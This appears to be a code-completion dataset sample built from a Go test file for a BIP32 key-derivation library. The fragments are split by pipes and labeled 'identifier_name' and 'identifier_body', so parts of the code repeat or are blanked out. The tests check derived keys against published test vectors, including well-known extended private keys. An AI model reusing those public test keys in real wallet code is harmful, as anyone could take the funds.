privKey: "xprvA2JDeKCSNNZky6uBCviVfJSKyQ1mDYahRjijr5idH2WwLsEd4Hsb2Tyh8RfQMuPh7f7RtyzTtdrbdqqsunu5Mm3wDvUAKRHSC34sJ7in334",
pubKey: "xpub6FHa3pjLCk84BayeJxFW2SP4XRrFd1JYnxeLeU8EqN3vDfZmbqBqaGJAyiLjTAwm6ZLRQUMv1ZACTj37sR62cfN7fe5JnJ7dh8zL4fiyLHV",
},
{
pathFragment: 1000000000,
privKey: "xprvA41z7zogVVwxVSgdKUHDy1SKmdb533PjDz7J6N6mV6uS3ze1ai8FHa8kmHScGpWmj4WggLyQjgPie1rFSruoUihUZREPSL39UNdE3BBDu76",
pubKey: "xpub6H1LXWLaKsWFhvm6RVpEL9P4KfRZSW7abD2ttkWP3SSQvnyA8FSVqNTEcYFgJS2UaFcxupHiYkro49S8yGasTvXEYBVPamhGW6cFJodrTHy",
},
},
}
vector2 := testMasterKey{
seed: "fffcf9f6f3f0edeae7e4e1dedbd8d5d2cfccc9c6c3c0bdbab7b4b1aeaba8a5a29f9c999693908d8a8784817e7b7875726f6c696663605d5a5754514e4b484542",
privKey: "xprv9s21ZrQH143K31xYSDQpPDxsXRTUcvj2iNHm5NUtrGiGG5e2DtALGdso3pGz6ssrdK4PFmM8NSpSBHNqPqm55Qn3LqFtT2emdEXVYsCzC2U",
pubKey: "xpub661MyMwAqRbcFW31YEwpkMuc5THy2PSt5bDMsktWQcFF8syAmRUapSCGu8ED9W6oDMSgv6Zz8idoc4a6mr8BDzTJY47LJhkJ8UB7WEGuduB",
children: []testChildKey{
{
pathFragment: 0,
privKey: "xprv9vHkqa6EV4sPZHYqZznhT2NPtPCjKuDKGY38FBWLvgaDx45zo9WQRUT3dKYnjwih2yJD9mkrocEZXo1ex8G81dwSM1fwqWpWkeS3v86pgKt",
pubKey: "xpub69H7F5d8KSRgmmdJg2KhpAK8SR3DjMwAdkxj3ZuxV27CprR9LgpeyGmXUbC6wb7ERfvrnKZjXoUmmDznezpbZb7ap6r1D3tgFxHmwMkQTPH",
},
{
pathFragment: 2147483647 + hStart,
privKey: "xprv9wSp6B7kry3Vj9m1zSnLvN3xH8RdsPP1Mh7fAaR7aRLcQMKTR2vidYEeEg2mUCTAwCd6vnxVrcjfy2kRgVsFawNzmjuHc2YmYRmagcEPdU9",
pubKey: "xpub6ASAVgeehLbnwdqV6UKMHVzgqAG8Gr6riv3Fxxpj8ksbH9ebxaEyBLZ85ySDhKiLDBrQSARLq1uNRts8RuJiHjaDMBU4Zn9h8LZNnBC5y4a",
},
{
pathFragment: 1,
privKey: "xprv9zFnWC6h2cLgpmSA46vutJzBcfJ8yaJGg8cX1e5StJh45BBciYTRXSd25UEPVuesF9yog62tGAQtHjXajPPdbRCHuWS6T8XA2ECKADdw4Ef",
pubKey: "xpub6DF8uhdarytz3FWdA8TvFSvvAh8dP3283MY7p2V4SeE2wyWmG5mg5EwVvmdMVCQcoNJxGoWaU9DCWh89LojfZ537wTfunKau47EL2dhHKon",
},
{
pathFragment: 2147483646 + hStart,
privKey: "xprvA1RpRA33e1JQ7ifknakTFpgNXPmW2YvmhqLQYMmrj4xJXXWYpDPS3xz7iAxn8L39njGVyuoseXzU6rcxFLJ8HFsTjSyQbLYnMpCqE2VbFWc",
pubKey: "xpub6ERApfZwUNrhLCkDtcHTcxd75RbzS1ed54G1LkBUHQVHQKqhMkhgbmJbZRkrgZw4koxb5JaHWkY4ALHY2grBGRjaDMzQLcgJvLJuZZvRcEL",
},
{
pathFragment: 2,
privKey: "xprvA2nrNbFZABcdryreWet9Ea4LvTJcGsqrMzxHx98MMrotbir7yrKCEXw7nadnHM8Dq38EGfSh6dqA9QWTyefMLEcBYJUuekgW4BYPJcr9E7j",
pubKey: "xpub6FnCn6nSzZAw5Tw7cgR9bi15UV96gLZhjDstkXXxvCLsUXBGXPdSnLFbdpq8p9HmGsApME5hQTZ3emM2rnY5agb9rXpVGyy3bdW6EEgAtqt",
},
},
}
vector3 := testMasterKey{
seed: "4b381541583be4423346c643850da4b320e46a87ae3d2a4e6da11eba819cd4acba45d239319ac14f863b8d5ab5a0d0c64d2e8a1e7d1457df2e5a3c51c73235be",
privKey: "xprv9s21ZrQH143K25QhxbucbDDuQ4naNntJRi4KUfWT7xo4EKsHt2QJDu7KXp1A3u7Bi1j8ph3EGsZ9Xvz9dGuVrtHHs7pXeTzjuxBrCmmhgC6",
pubKey: "xpub661MyMwAqRbcEZVB4dScxMAdx6d4nFc9nvyvH3v4gJL378CSRZiYmhRoP7mBy6gSPSCYk6SzXPTf3ND1cZAceL7SfJ1Z3GC8vBgp2epUt13",
children: []testChildKey{
{
pathFragment: hStart + 0,
privKey: "xprv9uPDJpEQgRQfDcW7BkF7eTya6RPxXeJCqCJGHuCJ4GiRVLzkTXBAJMu2qaMWPrS7AANYqdq6vcBcBUdJCVVFceUvJFjaPdGZ2y9WACViL4L",
pubKey: "xpub68NZiKmJWnxxS6aaHmn81bvJeTESw724CRDs6HbuccFQN9Ku14VQrADWgqbhhTHBaohPX4CjNLf9fq9MYo6oDaPPLPxSb7gwQN3ih19Zm4Y",
},
},
}
testVectorKeyPairs(t, vector1)
testVectorKeyPairs(t, vector2)
testVectorKeyPairs(t, vector3)
}
func testVectorKeyPairs(t *testing.T, vector testMasterKey) {
	// Decode the hex-encoded master seed into bytes
seed, _ := hex.DecodeString(vector.seed)
// Generate a master private and public key
privKey, err := NewMasterKey(seed)
assert.NoError(t, err)
pubKey := privKey.PublicKey()
assert.Equal(t, vector.privKey, privKey.String())
assert.Equal(t, vector.pubKey, pubKey.String())
// Iterate over the entire child chain and test the given keys
for _, testChildKey := range vector.children {
// Get the private key at the given key tree path
privKey, err = privKey.NewChildKey(testChildKey.pathFragment)
assert.NoError(t, err)
// Get this private key's public key
pubKey = privKey.PublicKey()
// Assert correctness
assert.Equal(t, testChildKey.privKey, privKey.String())
assert.Equal(t, testChildKey.pubKey, pubKey.String())
// Serialize and deserialize both keys and ensure they're the same
assertKeySerialization(t, privKey, testChildKey.privKey)
assertKeySerialization(t, pubKey, testChildKey.pubKey)
}
}
func TestPublicParentPublicChildDerivation(t *testing.T) {
// Generated using https://iancoleman.github.io/bip39/
// Root key:
// xprv9s21ZrQH143K2Cfj4mDZBcEecBmJmawReGwwoAou2zZzG45bM6cFPJSvobVTCB55L6Ld2y8RzC61CpvadeAnhws3CHsMFhNjozBKGNgucYm
// Derivation Path m/44'/60'/0'/0:
// xprv9zy5o7z1GMmYdaeQdmabWFhUf52Ytbpe3G5hduA4SghboqWe7aDGWseN8BJy1GU72wPjkCbBE1hvbXYqpCecAYdaivxjNnBoSNxwYD4wHpW
// xpub6DxSCdWu6jKqr4isjo7bsPeDD6s3J4YVQV1JSHZg12Eagdqnf7XX4fxqyW2sLhUoFWutL7tAELU2LiGZrEXtjVbvYptvTX5Eoa4Mamdjm9u
extendedMasterPublic, err := B58Deserialize(
"xpub6DxSCdWu6jKqr4isjo7bsPeDD6s3J4YVQV1JSHZg12Eagdqnf7XX4fxqyW2sLhUoFWutL7tAELU2LiGZrEXtjVbvYptvTX5Eoa4Mamdjm9u",
DefaultBip32Version)
assert.NoError(t, err)
expectedChildren := []testChildKey{
{pathFragment: 0, hexPubKey: "0243187e1a2ba9ba824f5f81090650c8f4faa82b7baf93060d10b81f4b705afd46"},
{pathFragment: 1, hexPubKey: "023790d11eb715c4320d8e31fba3a09b700051dc2cdbcce03f44b11c274d1e220b"},
{pathFragment: 2, hexPubKey: "0302c5749c3c75cea234878ae3f4d8f65b75d584bcd7ed0943b016d6f6b59a2bad"},
{pathFragment: 3, hexPubKey: "03f0440c94e5b14ea5b15875934597afff541bec287c6e65dc1102cafc07f69699"},
{pathFragment: 4, hexPubKey: "026419d0d8996707605508ac44c5871edc7fe206a79ef615b74f2eea09c5852e2b"},
{pathFragment: 5, hexPubKey: "02f63c6f195eea98bdb163c4a094260dea71d264b21234bed4df3899236e6c2298"},
{pathFragment: 6, hexPubKey: "02d74709cd522081064858f393d009ead5a0ecd43ede3a1f57befcc942025cb5f9"},
{pathFragment: 7, hexPubKey: "03e54bb92630c943d38bbd8a4a2e65fca7605e672d30a0e545a7198cbb60729ceb"},
{pathFragment: 8, hexPubKey: "027e9d5acd14d39c4938697fba388cd2e8f31fc1c5dc02fafb93a10a280de85199"},
{pathFragment: 9, hexPubKey: "02a167a9f0d57468fb6abf2f3f7967e2cadf574314753a06a9ef29bc76c54638d2"},
{pathFragment: 100, hexPubKey: "020db9ba00ddf68428e3f5bfe54252bbcd75b21e42f51bf3bfc4172bf0e5fa7905"},
{pathFragment: 101, hexPubKey: "0299e3790956570737d6164e6fcda5a3daa304065ca95ba46bc73d436b84f34d46"},
{pathFragment: 102, hexPubKey: "0202e0732c4c5d2b1036af173640e01957998cfd4f9cdaefab6ffe76eb869e2c59"},
{pathFragment: 103, hexPubKey: "03d050adbd996c0c5d737ff638402dfbb8c08e451fef10e6d62fb57887c1ac6cb2"},
{pathFragment: 104, hexPubKey: "038d466399e2d68b4b16043ad4d88893b3b2f84fc443368729a973df1e66f4f530"},
{pathFragment: 105, hexPubKey: "034811e2f0c8c50440c08c2c9799b99c911c036e877e8325386ff61723ae3ffdce"},
{pathFragment: 106, hexPubKey: "026339fd5842921888e711a6ba9104a5f0c94cc0569855273cf5faefdfbcd3cc29"},
{pathFragment: 107, hexPubKey: "02833705c1069fab2aa92c6b0dac27807290d72e9f52378d493ac44849ca003b22"},
{pathFragment: 108, hexPubKey: "032d2639bde1eb7bdf8444bd4f6cc26a9d1bdecd8ea15fac3b992c3da68d9d1df5"},
{pathFragment: 109, hexPubKey: "02479c6d4a64b93a2f4343aa862c938fbc658c99219dd7bebb4830307cbd76c9e9"},
}
for _, child := range expectedChildren {
pubKey, err := extendedMasterPublic.NewChildKey(child.pathFragment)
assert.NoError(t, err)
assert.False(t, pubKey.IsPrivate)
assert.Equal(t, child.hexPubKey, hex.EncodeToString(pubKey.Key))
}
}
func TestNewSeed(t *testing.T) {
for i := 0; i < 20; i++ {
seed, err := NewSeed()
assert.NoError(t, err)
assert.Equal(t, 256, len(seed))
}
}
func | (t *testing.T) {
tests := []struct {
seed []byte
base58 string
}{
{[]byte{}, "xprv9s21ZrQH143K4YUcKrp6cVxQaX59ZFkN6MFdeZjt8CHVYNs55xxQSvZpHWfojWMv6zgjmzopCyWPSFAnV4RU33J4pwCcnhsB4R4mPEnTsMC"},
{[]byte{1}, "xprv9s21ZrQH143K3YSbAXLMPCzJso5QAarQksAGc5rQCyZCBfw4Rj2PqVLFNgezSBhktYkiL3Ta2stLPDF9yZtLMaxk6Spiqh3DNFG8p8MVeEC"},
{[]byte{1, 2, 3, 4, 5, 6, 7, 8, 9, 0}, "xprv9s21ZrQH143K2hKT3jMKPFEcQLbx2XD55NtqQA7B4C5U9mTZY7gBeCdoFgurN4pxkQshzP8AQhBmUNgAo5djj5FzvUFh5pKH6wcRMSXVuc1"},
}
for _, test := range tests {
key, err := NewMasterKey(test.seed)
assert.NoError(t, err)
assertKeySerialization(t, key, test.base58)
}
}
func TestDeserializingInvalidStrings(t *testing.T) {
tests := []struct {
err error
base58 string
}{
{ErrSerializedKeyWrongSize, "xprv9s21ZrQH143K4YUcKrp6cVxQaX59ZFkN6MFdeZjt8CHVYNs55xxQSvZpHWfojWMv6zgjmzopCyWPSFAnV4RU33J4pwCcnhsB4R4mPEnTsM"},
{ErrInvalidChecksum, "xprv9s21ZrQH143K3YSbAXLMPCzJso5QAarQksAGc5rQCyZCBfw4Rj2PqVLFNgezSBhktYkiL3Ta2stLPDF9yZtLMaxk6Spiqh3DNFG8p8MVeEc"},
}
for _, test := range tests {
_, err := B58Deserialize(test.base58, DefaultBip32Version)
assert.Equal(t, test.err, err)
}
_, err := B58Deserialize("notbase58iiiiiIIIIIbAXLMPCzJso5QAarQksAGc5rQCyZCBfw4Rj2PqVLFNgezSBhktYkiL3Ta2stLPDF9yZtLMaxk6Spiqh3DNFG8p8MVeEc",
DefaultBip32Version)
assert.NotNil(t, err)
}
func TestCantCreateHardenedPublicChild(t *testing.T) {
key, err := NewMasterKey([]byte{})
assert.NoError(t, err)
// Test that it works for private keys
_, err = key.NewChildKey(FirstHardenedChild - 1)
assert.NoError(t, err)
_, err = key.NewChildKey(FirstHardenedChild)
assert.NoError(t, err)
_, err = key.NewChildKey(FirstHardenedChild + 1)
assert.NoError(t, err)
// Test that it throws an error for public keys if hardened
key = key.PublicKey()
_, err = key.NewChildKey(FirstHardenedChild - 1)
assert.NoError(t, err)
_, err = key.NewChildKey(FirstHardenedChild)
assert.Equal(t, ErrHardnedChildPublicKey, err)
_, err = key.NewChildKey(FirstHardenedChild + 1)
assert.Equal(t, ErrHardnedChildPublicKey, err)
}
func assertKeySerialization(t *testing.T, key *Key, knownBase58 string) {
serializedBase58 := key.B58Serialize()
assert.Equal(t, knownBase58, serializedBase58)
unserializedBase58, err := B58Deserialize(serializedBase58, DefaultBip32Version)
assert.NoError(t, err)
assert.Equal(t, key, unserializedBase58)
}
| TestB58SerializeUnserialize | identifier_name |
bip32_test.go | package bip32
import (
"encoding/hex"
"testing"
"github.com/stretchr/testify/assert"
)
type testMasterKey struct {
seed string
children []testChildKey
privKey string
pubKey string
}
type testChildKey struct {
pathFragment uint32
privKey string
pubKey string
hexPubKey string
}
func TestBip32TestVectors(t *testing.T) |
func testVectorKeyPairs(t *testing.T, vector testMasterKey) {
	// Decode the hex-encoded master seed into bytes
seed, _ := hex.DecodeString(vector.seed)
// Generate a master private and public key
privKey, err := NewMasterKey(seed)
assert.NoError(t, err)
pubKey := privKey.PublicKey()
assert.Equal(t, vector.privKey, privKey.String())
assert.Equal(t, vector.pubKey, pubKey.String())
// Iterate over the entire child chain and test the given keys
for _, testChildKey := range vector.children {
// Get the private key at the given key tree path
privKey, err = privKey.NewChildKey(testChildKey.pathFragment)
assert.NoError(t, err)
// Get this private key's public key
pubKey = privKey.PublicKey()
// Assert correctness
assert.Equal(t, testChildKey.privKey, privKey.String())
assert.Equal(t, testChildKey.pubKey, pubKey.String())
// Serialize and deserialize both keys and ensure they're the same
assertKeySerialization(t, privKey, testChildKey.privKey)
assertKeySerialization(t, pubKey, testChildKey.pubKey)
}
}
func TestPublicParentPublicChildDerivation(t *testing.T) {
// Generated using https://iancoleman.github.io/bip39/
// Root key:
// xprv9s21ZrQH143K2Cfj4mDZBcEecBmJmawReGwwoAou2zZzG45bM6cFPJSvobVTCB55L6Ld2y8RzC61CpvadeAnhws3CHsMFhNjozBKGNgucYm
// Derivation Path m/44'/60'/0'/0:
// xprv9zy5o7z1GMmYdaeQdmabWFhUf52Ytbpe3G5hduA4SghboqWe7aDGWseN8BJy1GU72wPjkCbBE1hvbXYqpCecAYdaivxjNnBoSNxwYD4wHpW
// xpub6DxSCdWu6jKqr4isjo7bsPeDD6s3J4YVQV1JSHZg12Eagdqnf7XX4fxqyW2sLhUoFWutL7tAELU2LiGZrEXtjVbvYptvTX5Eoa4Mamdjm9u
extendedMasterPublic, err := B58Deserialize(
"xpub6DxSCdWu6jKqr4isjo7bsPeDD6s3J4YVQV1JSHZg12Eagdqnf7XX4fxqyW2sLhUoFWutL7tAELU2LiGZrEXtjVbvYptvTX5Eoa4Mamdjm9u",
DefaultBip32Version)
assert.NoError(t, err)
expectedChildren := []testChildKey{
{pathFragment: 0, hexPubKey: "0243187e1a2ba9ba824f5f81090650c8f4faa82b7baf93060d10b81f4b705afd46"},
{pathFragment: 1, hexPubKey: "023790d11eb715c4320d8e31fba3a09b700051dc2cdbcce03f44b11c274d1e220b"},
{pathFragment: 2, hexPubKey: "0302c5749c3c75cea234878ae3f4d8f65b75d584bcd7ed0943b016d6f6b59a2bad"},
{pathFragment: 3, hexPubKey: "03f0440c94e5b14ea5b15875934597afff541bec287c6e65dc1102cafc07f69699"},
{pathFragment: 4, hexPubKey: "026419d0d8996707605508ac44c5871edc7fe206a79ef615b74f2eea09c5852e2b"},
{pathFragment: 5, hexPubKey: "02f63c6f195eea98bdb163c4a094260dea71d264b21234bed4df3899236e6c2298"},
{pathFragment: 6, hexPubKey: "02d74709cd522081064858f393d009ead5a0ecd43ede3a1f57befcc942025cb5f9"},
{pathFragment: 7, hexPubKey: "03e54bb92630c943d38bbd8a4a2e65fca7605e672d30a0e545a7198cbb60729ceb"},
{pathFragment: 8, hexPubKey: "027e9d5acd14d39c4938697fba388cd2e8f31fc1c5dc02fafb93a10a280de85199"},
{pathFragment: 9, hexPubKey: "02a167a9f0d57468fb6abf2f3f7967e2cadf574314753a06a9ef29bc76c54638d2"},
{pathFragment: 100, hexPubKey: "020db9ba00ddf68428e3f5bfe54252bbcd75b21e42f51bf3bfc4172bf0e5fa7905"},
{pathFragment: 101, hexPubKey: "0299e3790956570737d6164e6fcda5a3daa304065ca95ba46bc73d436b84f34d46"},
{pathFragment: 102, hexPubKey: "0202e0732c4c5d2b1036af173640e01957998cfd4f9cdaefab6ffe76eb869e2c59"},
{pathFragment: 103, hexPubKey: "03d050adbd996c0c5d737ff638402dfbb8c08e451fef10e6d62fb57887c1ac6cb2"},
{pathFragment: 104, hexPubKey: "038d466399e2d68b4b16043ad4d88893b3b2f84fc443368729a973df1e66f4f530"},
{pathFragment: 105, hexPubKey: "034811e2f0c8c50440c08c2c9799b99c911c036e877e8325386ff61723ae3ffdce"},
{pathFragment: 106, hexPubKey: "026339fd5842921888e711a6ba9104a5f0c94cc0569855273cf5faefdfbcd3cc29"},
{pathFragment: 107, hexPubKey: "02833705c1069fab2aa92c6b0dac27807290d72e9f52378d493ac44849ca003b22"},
{pathFragment: 108, hexPubKey: "032d2639bde1eb7bdf8444bd4f6cc26a9d1bdecd8ea15fac3b992c3da68d9d1df5"},
{pathFragment: 109, hexPubKey: "02479c6d4a64b93a2f4343aa862c938fbc658c99219dd7bebb4830307cbd76c9e9"},
}
for _, child := range expectedChildren {
pubKey, err := extendedMasterPublic.NewChildKey(child.pathFragment)
assert.NoError(t, err)
assert.False(t, pubKey.IsPrivate)
assert.Equal(t, child.hexPubKey, hex.EncodeToString(pubKey.Key))
}
}
func TestNewSeed(t *testing.T) {
for i := 0; i < 20; i++ {
seed, err := NewSeed()
assert.NoError(t, err)
assert.Equal(t, 256, len(seed))
}
}
func TestB58SerializeUnserialize(t *testing.T) {
tests := []struct {
seed []byte
base58 string
}{
{[]byte{}, "xprv9s21ZrQH143K4YUcKrp6cVxQaX59ZFkN6MFdeZjt8CHVYNs55xxQSvZpHWfojWMv6zgjmzopCyWPSFAnV4RU33J4pwCcnhsB4R4mPEnTsMC"},
{[]byte{1}, "xprv9s21ZrQH143K3YSbAXLMPCzJso5QAarQksAGc5rQCyZCBfw4Rj2PqVLFNgezSBhktYkiL3Ta2stLPDF9yZtLMaxk6Spiqh3DNFG8p8MVeEC"},
{[]byte{1, 2, 3, 4, 5, 6, 7, 8, 9, 0}, "xprv9s21ZrQH143K2hKT3jMKPFEcQLbx2XD55NtqQA7B4C5U9mTZY7gBeCdoFgurN4pxkQshzP8AQhBmUNgAo5djj5FzvUFh5pKH6wcRMSXVuc1"},
}
for _, test := range tests {
key, err := NewMasterKey(test.seed)
assert.NoError(t, err)
assertKeySerialization(t, key, test.base58)
}
}
func TestDeserializingInvalidStrings(t *testing.T) {
tests := []struct {
err error
base58 string
}{
{ErrSerializedKeyWrongSize, "xprv9s21ZrQH143K4YUcKrp6cVxQaX59ZFkN6MFdeZjt8CHVYNs55xxQSvZpHWfojWMv6zgjmzopCyWPSFAnV4RU33J4pwCcnhsB4R4mPEnTsM"},
{ErrInvalidChecksum, "xprv9s21ZrQH143K3YSbAXLMPCzJso5QAarQksAGc5rQCyZCBfw4Rj2PqVLFNgezSBhktYkiL3Ta2stLPDF9yZtLMaxk6Spiqh3DNFG8p8MVeEc"},
}
for _, test := range tests {
_, err := B58Deserialize(test.base58, DefaultBip32Version)
assert.Equal(t, test.err, err)
}
_, err := B58Deserialize("notbase58iiiiiIIIIIbAXLMPCzJso5QAarQksAGc5rQCyZCBfw4Rj2PqVLFNgezSBhktYkiL3Ta2stLPDF9yZtLMaxk6Spiqh3DNFG8p8MVeEc",
DefaultBip32Version)
assert.NotNil(t, err)
}
func TestCantCreateHardenedPublicChild(t *testing.T) {
key, err := NewMasterKey([]byte{})
assert.NoError(t, err)
// Test that it works for private keys
_, err = key.NewChildKey(FirstHardenedChild - 1)
assert.NoError(t, err)
_, err = key.NewChildKey(FirstHardenedChild)
assert.NoError(t, err)
_, err = key.NewChildKey(FirstHardenedChild + 1)
assert.NoError(t, err)
// Test that it throws an error for public keys if hardened
key = key.PublicKey()
_, err = key.NewChildKey(FirstHardenedChild - 1)
assert.NoError(t, err)
_, err = key.NewChildKey(FirstHardenedChild)
assert.Equal(t, ErrHardnedChildPublicKey, err)
_, err = key.NewChildKey(FirstHardenedChild + 1)
assert.Equal(t, ErrHardnedChildPublicKey, err)
}
func assertKeySerialization(t *testing.T, key *Key, knownBase58 string) {
serializedBase58 := key.B58Serialize()
assert.Equal(t, knownBase58, serializedBase58)
unserializedBase58, err := B58Deserialize(serializedBase58, DefaultBip32Version)
assert.NoError(t, err)
assert.Equal(t, key, unserializedBase58)
}
| {
hStart := FirstHardenedChild
vector1 := testMasterKey{
seed: "000102030405060708090a0b0c0d0e0f",
privKey: "xprv9s21ZrQH143K3QTDL4LXw2F7HEK3wJUD2nW2nRk4stbPy6cq3jPPqjiChkVvvNKmPGJxWUtg6LnF5kejMRNNU3TGtRBeJgk33yuGBxrMPHi",
pubKey: "xpub661MyMwAqRbcFtXgS5sYJABqqG9YLmC4Q1Rdap9gSE8NqtwybGhePY2gZ29ESFjqJoCu1Rupje8YtGqsefD265TMg7usUDFdp6W1EGMcet8",
children: []testChildKey{
{
pathFragment: hStart,
privKey: "xprv9uHRZZhk6KAJC1avXpDAp4MDc3sQKNxDiPvvkX8Br5ngLNv1TxvUxt4cV1rGL5hj6KCesnDYUhd7oWgT11eZG7XnxHrnYeSvkzY7d2bhkJ7",
pubKey: "xpub68Gmy5EdvgibQVfPdqkBBCHxA5htiqg55crXYuXoQRKfDBFA1WEjWgP6LHhwBZeNK1VTsfTFUHCdrfp1bgwQ9xv5ski8PX9rL2dZXvgGDnw",
},
{
pathFragment: 1,
privKey: "xprv9wTYmMFdV23N2TdNG573QoEsfRrWKQgWeibmLntzniatZvR9BmLnvSxqu53Kw1UmYPxLgboyZQaXwTCg8MSY3H2EU4pWcQDnRnrVA1xe8fs",
pubKey: "xpub6ASuArnXKPbfEwhqN6e3mwBcDTgzisQN1wXN9BJcM47sSikHjJf3UFHKkNAWbWMiGj7Wf5uMash7SyYq527Hqck2AxYysAA7xmALppuCkwQ",
},
{
pathFragment: 2 + hStart,
privKey: "xprv9z4pot5VBttmtdRTWfWQmoH1taj2axGVzFqSb8C9xaxKymcFzXBDptWmT7FwuEzG3ryjH4ktypQSAewRiNMjANTtpgP4mLTj34bhnZX7UiM",
pubKey: "xpub6D4BDPcP2GT577Vvch3R8wDkScZWzQzMMUm3PWbmWvVJrZwQY4VUNgqFJPMM3No2dFDFGTsxxpG5uJh7n7epu4trkrX7x7DogT5Uv6fcLW5",
},
{
pathFragment: 2,
privKey: "xprvA2JDeKCSNNZky6uBCviVfJSKyQ1mDYahRjijr5idH2WwLsEd4Hsb2Tyh8RfQMuPh7f7RtyzTtdrbdqqsunu5Mm3wDvUAKRHSC34sJ7in334",
pubKey: "xpub6FHa3pjLCk84BayeJxFW2SP4XRrFd1JYnxeLeU8EqN3vDfZmbqBqaGJAyiLjTAwm6ZLRQUMv1ZACTj37sR62cfN7fe5JnJ7dh8zL4fiyLHV",
},
{
pathFragment: 1000000000,
privKey: "xprvA41z7zogVVwxVSgdKUHDy1SKmdb533PjDz7J6N6mV6uS3ze1ai8FHa8kmHScGpWmj4WggLyQjgPie1rFSruoUihUZREPSL39UNdE3BBDu76",
pubKey: "xpub6H1LXWLaKsWFhvm6RVpEL9P4KfRZSW7abD2ttkWP3SSQvnyA8FSVqNTEcYFgJS2UaFcxupHiYkro49S8yGasTvXEYBVPamhGW6cFJodrTHy",
},
},
}
vector2 := testMasterKey{
seed: "fffcf9f6f3f0edeae7e4e1dedbd8d5d2cfccc9c6c3c0bdbab7b4b1aeaba8a5a29f9c999693908d8a8784817e7b7875726f6c696663605d5a5754514e4b484542",
privKey: "xprv9s21ZrQH143K31xYSDQpPDxsXRTUcvj2iNHm5NUtrGiGG5e2DtALGdso3pGz6ssrdK4PFmM8NSpSBHNqPqm55Qn3LqFtT2emdEXVYsCzC2U",
pubKey: "xpub661MyMwAqRbcFW31YEwpkMuc5THy2PSt5bDMsktWQcFF8syAmRUapSCGu8ED9W6oDMSgv6Zz8idoc4a6mr8BDzTJY47LJhkJ8UB7WEGuduB",
children: []testChildKey{
{
pathFragment: 0,
privKey: "xprv9vHkqa6EV4sPZHYqZznhT2NPtPCjKuDKGY38FBWLvgaDx45zo9WQRUT3dKYnjwih2yJD9mkrocEZXo1ex8G81dwSM1fwqWpWkeS3v86pgKt",
pubKey: "xpub69H7F5d8KSRgmmdJg2KhpAK8SR3DjMwAdkxj3ZuxV27CprR9LgpeyGmXUbC6wb7ERfvrnKZjXoUmmDznezpbZb7ap6r1D3tgFxHmwMkQTPH",
},
{
pathFragment: 2147483647 + hStart,
privKey: "xprv9wSp6B7kry3Vj9m1zSnLvN3xH8RdsPP1Mh7fAaR7aRLcQMKTR2vidYEeEg2mUCTAwCd6vnxVrcjfy2kRgVsFawNzmjuHc2YmYRmagcEPdU9",
pubKey: "xpub6ASAVgeehLbnwdqV6UKMHVzgqAG8Gr6riv3Fxxpj8ksbH9ebxaEyBLZ85ySDhKiLDBrQSARLq1uNRts8RuJiHjaDMBU4Zn9h8LZNnBC5y4a",
},
{
pathFragment: 1,
privKey: "xprv9zFnWC6h2cLgpmSA46vutJzBcfJ8yaJGg8cX1e5StJh45BBciYTRXSd25UEPVuesF9yog62tGAQtHjXajPPdbRCHuWS6T8XA2ECKADdw4Ef",
pubKey: "xpub6DF8uhdarytz3FWdA8TvFSvvAh8dP3283MY7p2V4SeE2wyWmG5mg5EwVvmdMVCQcoNJxGoWaU9DCWh89LojfZ537wTfunKau47EL2dhHKon",
},
{
pathFragment: 2147483646 + hStart,
privKey: "xprvA1RpRA33e1JQ7ifknakTFpgNXPmW2YvmhqLQYMmrj4xJXXWYpDPS3xz7iAxn8L39njGVyuoseXzU6rcxFLJ8HFsTjSyQbLYnMpCqE2VbFWc",
pubKey: "xpub6ERApfZwUNrhLCkDtcHTcxd75RbzS1ed54G1LkBUHQVHQKqhMkhgbmJbZRkrgZw4koxb5JaHWkY4ALHY2grBGRjaDMzQLcgJvLJuZZvRcEL",
},
{
pathFragment: 2,
privKey: "xprvA2nrNbFZABcdryreWet9Ea4LvTJcGsqrMzxHx98MMrotbir7yrKCEXw7nadnHM8Dq38EGfSh6dqA9QWTyefMLEcBYJUuekgW4BYPJcr9E7j",
pubKey: "xpub6FnCn6nSzZAw5Tw7cgR9bi15UV96gLZhjDstkXXxvCLsUXBGXPdSnLFbdpq8p9HmGsApME5hQTZ3emM2rnY5agb9rXpVGyy3bdW6EEgAtqt",
},
},
}
vector3 := testMasterKey{
seed: "4b381541583be4423346c643850da4b320e46a87ae3d2a4e6da11eba819cd4acba45d239319ac14f863b8d5ab5a0d0c64d2e8a1e7d1457df2e5a3c51c73235be",
privKey: "xprv9s21ZrQH143K25QhxbucbDDuQ4naNntJRi4KUfWT7xo4EKsHt2QJDu7KXp1A3u7Bi1j8ph3EGsZ9Xvz9dGuVrtHHs7pXeTzjuxBrCmmhgC6",
pubKey: "xpub661MyMwAqRbcEZVB4dScxMAdx6d4nFc9nvyvH3v4gJL378CSRZiYmhRoP7mBy6gSPSCYk6SzXPTf3ND1cZAceL7SfJ1Z3GC8vBgp2epUt13",
children: []testChildKey{
{
pathFragment: hStart + 0,
privKey: "xprv9uPDJpEQgRQfDcW7BkF7eTya6RPxXeJCqCJGHuCJ4GiRVLzkTXBAJMu2qaMWPrS7AANYqdq6vcBcBUdJCVVFceUvJFjaPdGZ2y9WACViL4L",
pubKey: "xpub68NZiKmJWnxxS6aaHmn81bvJeTESw724CRDs6HbuccFQN9Ku14VQrADWgqbhhTHBaohPX4CjNLf9fq9MYo6oDaPPLPxSb7gwQN3ih19Zm4Y",
},
},
}
testVectorKeyPairs(t, vector1)
testVectorKeyPairs(t, vector2)
testVectorKeyPairs(t, vector3)
} | identifier_body |
bip32_test.go | package bip32
import (
"encoding/hex"
"testing"
"github.com/stretchr/testify/assert"
)
type testMasterKey struct {
seed string
children []testChildKey
privKey string
pubKey string
}
type testChildKey struct {
pathFragment uint32
privKey string
pubKey string
hexPubKey string
}
func TestBip32TestVectors(t *testing.T) {
hStart := FirstHardenedChild
vector1 := testMasterKey{
seed: "000102030405060708090a0b0c0d0e0f",
privKey: "xprv9s21ZrQH143K3QTDL4LXw2F7HEK3wJUD2nW2nRk4stbPy6cq3jPPqjiChkVvvNKmPGJxWUtg6LnF5kejMRNNU3TGtRBeJgk33yuGBxrMPHi",
pubKey: "xpub661MyMwAqRbcFtXgS5sYJABqqG9YLmC4Q1Rdap9gSE8NqtwybGhePY2gZ29ESFjqJoCu1Rupje8YtGqsefD265TMg7usUDFdp6W1EGMcet8",
children: []testChildKey{
{
pathFragment: hStart,
privKey: "xprv9uHRZZhk6KAJC1avXpDAp4MDc3sQKNxDiPvvkX8Br5ngLNv1TxvUxt4cV1rGL5hj6KCesnDYUhd7oWgT11eZG7XnxHrnYeSvkzY7d2bhkJ7",
